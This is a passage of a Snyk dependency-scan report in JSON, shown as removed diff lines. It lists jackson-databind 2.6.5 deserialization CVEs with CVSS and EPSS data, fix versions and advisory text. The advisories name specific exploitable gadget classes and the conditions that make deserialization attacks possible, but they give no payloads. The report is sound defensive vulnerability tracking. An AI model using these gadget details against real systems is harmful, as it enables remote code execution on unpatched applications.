WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92902", - "probability": "0.05021", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11619" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-27xj-rqx5-2255" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:59:04.995807Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.585105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "XuYuanzhen" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2704", - "title": "Github Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.439153Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:25.351249Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.587184Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n", - "epssDetails": { - "percentile": "0.93100", - "probability": "0.05308", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14062" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c265-37vj-cwcc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-05-29T15:36:30.302636Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-05-01T15:36:06Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-05-29T15:36:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.587184Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Al1ex@knownsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2765", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:46.171514Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.781685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.570033Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n", - "epssDetails": { - "percentile": "0.91500", - "probability": "0.03413", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14195" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mc6h-4qgp-37qh" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-14T14:48:40.820120Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-14T14:45:09Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-14T15:32:14Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.570033Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Topsec" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2688", - "title": "GitHub Issue" 